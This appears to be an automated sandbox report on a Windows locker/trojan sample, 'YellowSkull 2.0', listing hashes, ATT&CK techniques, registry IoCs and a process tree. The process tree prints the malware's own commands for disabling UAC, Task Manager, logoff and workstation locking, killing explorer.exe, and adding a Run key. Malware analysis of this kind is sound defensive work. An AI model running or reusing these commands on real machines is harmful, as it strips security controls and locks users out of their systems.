0fdcd8ef8be7b2bc8b2aa44ca2dfe251e8850b0be1e0ec563bd3736d2f05a09d

Analysis

max time kernel
147s
max time network
151s
platform
windows11-21h2_x64
resource
win11-20240802-en
resource tags

arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
submitted
29/08/2024, 02:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

YellowSkull 2.0.exe
Size

2.5MB
MD5

660e26001a8891e78135a09d3ec2623f
SHA1

bd95c1955be08eaecefa7b3dd1cbdac7387b6d06
SHA256

1811c7b5ddcc6637a782bf32db70b60bd0bf3ec2b3498716591f718cda25fd14
SHA512

590df723aaa52806f664adec89bf6e8e570a9c88b4858131fb59f23e31ab3302189393bceb58fe1aa71475065aefab2d093d5f8ad6296693d4124e5a10a34e92
SSDEEP

49152:cCEz1VWQraflEcY8GSFJ2CBUm5htDRvG0JuH0Xv6GVO8UKlo:cn14QilESfFim15rtxUuo

Score

10^/10

discovery evasion persistence ransomware trojan upx

Malware Config

Signatures

UAC bypass 3 TTPs 2 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Disables Task Manager via registry modification
evasion

Executes dropped EXE 2 IoCs

pid	Process
888	bg.exe
2992	YSkullLock.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral8/memory/3904-0-0x0000000000400000-0x0000000000DD9000-memory.dmp	upx
behavioral8/memory/3904-41-0x0000000000400000-0x0000000000DD9000-memory.dmp	upx

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\YellowSkull2 Special Program = "C:\\YSkullMBRSetup.exe"	reg.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3007475212-2160282277-2943627620-1000\Control Panel\Desktop\Wallpaper = "c:\\yellowskull.bmp"	reg.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 50 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	YSkullLock.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	YellowSkull 2.0.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
3912	taskkill.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3007475212-2160282277-2943627620-1000_Classes\Local Settings	cmd.exe

Modifies registry key 1 TTPs 7 IoCs

Modify Registry

T1112

pid	Process
4980	reg.exe
4600	reg.exe
780	reg.exe
2848	reg.exe
1412	reg.exe
2776	reg.exe
2136	reg.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	3912	taskkill.exe
Token: 33	3636	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	3636	AUDIODG.EXE

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2992	YSkullLock.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3904 wrote to memory of 4944	3904	YellowSkull 2.0.exe	82
PID 3904 wrote to memory of 4944	3904	YellowSkull 2.0.exe	82
PID 3904 wrote to memory of 4944	3904	YellowSkull 2.0.exe	82
PID 4944 wrote to memory of 2304	4944	cmd.exe	86
PID 4944 wrote to memory of 2304	4944	cmd.exe	86
PID 4944 wrote to memory of 2304	4944	cmd.exe	86
PID 4944 wrote to memory of 3280	4944	cmd.exe	87
PID 4944 wrote to memory of 3280	4944	cmd.exe	87
PID 4944 wrote to memory of 3280	4944	cmd.exe	87
PID 4944 wrote to memory of 4464	4944	cmd.exe	88
PID 4944 wrote to memory of 4464	4944	cmd.exe	88
PID 4944 wrote to memory of 4464	4944	cmd.exe	88
PID 4944 wrote to memory of 1416	4944	cmd.exe	89
PID 4944 wrote to memory of 1416	4944	cmd.exe	89
PID 4944 wrote to memory of 1416	4944	cmd.exe	89
PID 4944 wrote to memory of 2340	4944	cmd.exe	90
PID 4944 wrote to memory of 2340	4944	cmd.exe	90
PID 4944 wrote to memory of 2340	4944	cmd.exe	90
PID 4944 wrote to memory of 432	4944	cmd.exe	91
PID 4944 wrote to memory of 432	4944	cmd.exe	91
PID 4944 wrote to memory of 432	4944	cmd.exe	91
PID 4944 wrote to memory of 1792	4944	cmd.exe	92
PID 4944 wrote to memory of 1792	4944	cmd.exe	92
PID 4944 wrote to memory of 1792	4944	cmd.exe	92
PID 4944 wrote to memory of 3716	4944	cmd.exe	93
PID 4944 wrote to memory of 3716	4944	cmd.exe	93
PID 4944 wrote to memory of 3716	4944	cmd.exe	93
PID 4944 wrote to memory of 2360	4944	cmd.exe	94
PID 4944 wrote to memory of 2360	4944	cmd.exe	94
PID 4944 wrote to memory of 2360	4944	cmd.exe	94
PID 4944 wrote to memory of 1612	4944	cmd.exe	95
PID 4944 wrote to memory of 1612	4944	cmd.exe	95
PID 4944 wrote to memory of 1612	4944	cmd.exe	95
PID 4944 wrote to memory of 4864	4944	cmd.exe	96
PID 4944 wrote to memory of 4864	4944	cmd.exe	96
PID 4944 wrote to memory of 4864	4944	cmd.exe	96
PID 4944 wrote to memory of 2072	4944	cmd.exe	97
PID 4944 wrote to memory of 2072	4944	cmd.exe	97
PID 4944 wrote to memory of 2072	4944	cmd.exe	97
PID 4944 wrote to memory of 1656	4944	cmd.exe	98
PID 4944 wrote to memory of 1656	4944	cmd.exe	98
PID 4944 wrote to memory of 1656	4944	cmd.exe	98
PID 4944 wrote to memory of 2356	4944	cmd.exe	99
PID 4944 wrote to memory of 2356	4944	cmd.exe	99
PID 4944 wrote to memory of 2356	4944	cmd.exe	99
PID 4944 wrote to memory of 936	4944	cmd.exe	100
PID 4944 wrote to memory of 936	4944	cmd.exe	100
PID 4944 wrote to memory of 936	4944	cmd.exe	100
PID 4944 wrote to memory of 1908	4944	cmd.exe	101
PID 4944 wrote to memory of 1908	4944	cmd.exe	101
PID 4944 wrote to memory of 1908	4944	cmd.exe	101
PID 4944 wrote to memory of 1620	4944	cmd.exe	102
PID 4944 wrote to memory of 1620	4944	cmd.exe	102
PID 4944 wrote to memory of 1620	4944	cmd.exe	102
PID 4944 wrote to memory of 4800	4944	cmd.exe	103
PID 4944 wrote to memory of 4800	4944	cmd.exe	103
PID 4944 wrote to memory of 4800	4944	cmd.exe	103
PID 4944 wrote to memory of 3560	4944	cmd.exe	104
PID 4944 wrote to memory of 3560	4944	cmd.exe	104
PID 4944 wrote to memory of 3560	4944	cmd.exe	104
PID 4944 wrote to memory of 3204	4944	cmd.exe	105
PID 4944 wrote to memory of 3204	4944	cmd.exe	105
PID 4944 wrote to memory of 3204	4944	cmd.exe	105
PID 4944 wrote to memory of 4968	4944	cmd.exe	106

C:\Users\Admin\AppData\Local\Temp\YellowSkull 2.0.exe
"C:\Users\Admin\AppData\Local\Temp\YellowSkull 2.0.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3904
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\B6BD.tmp\YellowSkull2.bat" "
  2⤵
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:4944
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\yellowskull.bmp /f
    3⤵
    - Sets desktop wallpaper using registry
    - System Location Discovery: System Language Discovery
    PID:2304
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3280
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4464
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1416
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2340
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:432
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1792
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3716
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2360
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1612
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4864
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2072
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1656
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2356
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:936
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1908
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1620
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4800
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3560
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3204
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4968
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:660
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1932
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4376
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4624
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2172
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4664
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4768
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1640
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4764
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1544
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4808
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:224
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4356
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1248
- - C:\Windows\SysWOW64\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1904
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im explorer.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3912
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:4600
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:4980
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:780
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:2848
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:1412
- - C:\Windows\SysWOW64\reg.exe
    reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
    3⤵
    - UAC bypass
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:2776
- - C:\Windows\SysWOW64\reg.exe
    reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    - UAC bypass
    - System Location Discovery: System Language Discovery
    - Modifies registry key
    PID:2136
- - C:\Users\Admin\AppData\Local\Temp\B6BD.tmp\bg.exe
    bg.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:888
- - C:\Users\Admin\AppData\Local\Temp\B6BD.tmp\YSkullLock.exe
    YSkullLock.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:2992
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "YellowSkull2 Special Program" /t REG_SZ /F /D "C:\YSkullMBRSetup.exe"
    3⤵
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    PID:3180
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\B6BD.tmp\k.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:988

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004E4 0x00000000000004D0
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3636

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\B6BD.tmp\YSkullLock.exe

Filesize
2.9MB

MD5
2191c3a14b53531e82726b17dd331cef

SHA1
9fdcc1ef73bbd08ac8f4cb3bdaf4c4ed26a99737

SHA256
3b2abd3773e4678100f197f53a886ec833fd2e26aa9a94d780a2d22befdf7d44

SHA512
93dc75ae619bcac6566c6e773c3628c2ef1326d988e592e59a1c8f9be304014a970caf40bf255a52b26fb37ca1d2625c8bf95b5dc749f378a0450a74aa3421f9

Download Submit
C:\Users\Admin\AppData\Local\Temp\B6BD.tmp\YSkullMBRSetup.exe

Filesize
1.3MB

MD5
220303eb72ebde4605116640fb719b26

SHA1
2021794facb35a7a23796e74835d8cf93882ddaf

SHA256
f081c913488c3f22b62f906dac2a82a38d085ebe1d28701f0059dfdfbf1ccf42

SHA512
dc811be33365049b32c3a47de9b4f4e4f77be0a9dfd14bfcfce92a6f575cf9bbd4aa56fcc92a3d8bf7bd21354f6530f3cc50a1f185a5953861d3a73a3f1738fc

Download Submit
C:\Users\Admin\AppData\Local\Temp\B6BD.tmp\YellowSkull.bmp

Filesize
2.9MB

MD5
11bcda64d254ad8dc591b41f8fceb04d

SHA1
66d9dea8a7c3d0bb6e9924a4c86f5eef98317752

SHA256
84c5dad2d4cec5b636c1fae6f1e1482ada9f62363dcf269b4a86f6070d5b50fc

SHA512
b26287ed0de799b95a4bb1f18eb92e3a24dc8250eb09c669112d4b60e7e362012c564d0959ddfe128bc00a63601d9132160cc93276cb72ebc0e0ab2fc2d837b2

Download Submit
C:\Users\Admin\AppData\Local\Temp\B6BD.tmp\YellowSkull2.bat

Filesize
3KB

MD5
4671d5895d88bc19645cab0fc7ca398a

SHA1
d6b1ccef99793b0dcd09156a6460027271cde082

SHA256
dd8aa9f7955674a7a1b5b222d7c1809c583c705dae8bf476cdd42efcc0afabb5

SHA512
ea21a82ccbb1647bdd45890dadb1740a8dbb7d4cd7481a252545a6db2ce7fda1ce7c808b102bbd4dbd8764a6f824d6529044002f234bb5c255504f6b85ab926b

Download Submit
C:\Users\Admin\AppData\Local\Temp\B6BD.tmp\bg.exe

Filesize
102KB

MD5
12cf508e9058e3e67cf8a736557c2749

SHA1
8448240c260ccef2d23854e749387b65e4b6668e

SHA256
b3670ec42931e2dea3e03053eda32240d8b6db15bf89d0c74e23e99ecb0aaf49

SHA512
7a837b5a89f29974b1e305e2082d5f7aee46bee3cef7e8a8b47a877d5bd6280c359318d6002c2c283aed13054a8ee590778e99e423a25f84f3037b0249c6403a

Download Submit
C:\Users\Admin\AppData\Local\Temp\B6BD.tmp\bg.wav

Filesize
2.6MB

MD5
832b350b50a07906c630a2b8819fd209

SHA1
362d4d61df27a40f975e26b3d8ace1e8fac10f94

SHA256
94e1cecf8ed740ea45c87927de31005c3b2f9db261aae04fe56a81e337d1e8da

SHA512
cf267295d0248029e4a92d1052df1e24c93d3be79adb1efa9723c64e9c7bb52108a3bc194e772ff0e6dcb5b2208e9d7787a81a86e74ee11892571760e40abcbf

Download Submit
C:\Users\Admin\AppData\Local\Temp\B6BD.tmp\k.vbs

Filesize
140B

MD5
126595a4087b9e1b9bac69aab147c97f

SHA1
ef079808ab8f7b762c413c5fa5844f4285f2848c

SHA256
4c59cedcafe3f5a1025960b344107f7e18c98ca569d2e6c8aa3d685b20754089

SHA512
41cc1badee06c16a0c65cbf7f38a420ca3c8e0ea459afd208b9b01cbeeef6724b8f2c04ecb41bec9d045492f9be0361612204db77eae7e1aeece8fe3761a7eb4

Download Submit
memory/888-42-0x0000000000400000-0x000000000041D000-memory.dmp

Filesize
116KB

Download
memory/3904-0-0x0000000000400000-0x0000000000DD9000-memory.dmp

Filesize
9.8MB

Download
memory/3904-41-0x0000000000400000-0x0000000000DD9000-memory.dmp

Filesize
9.8MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads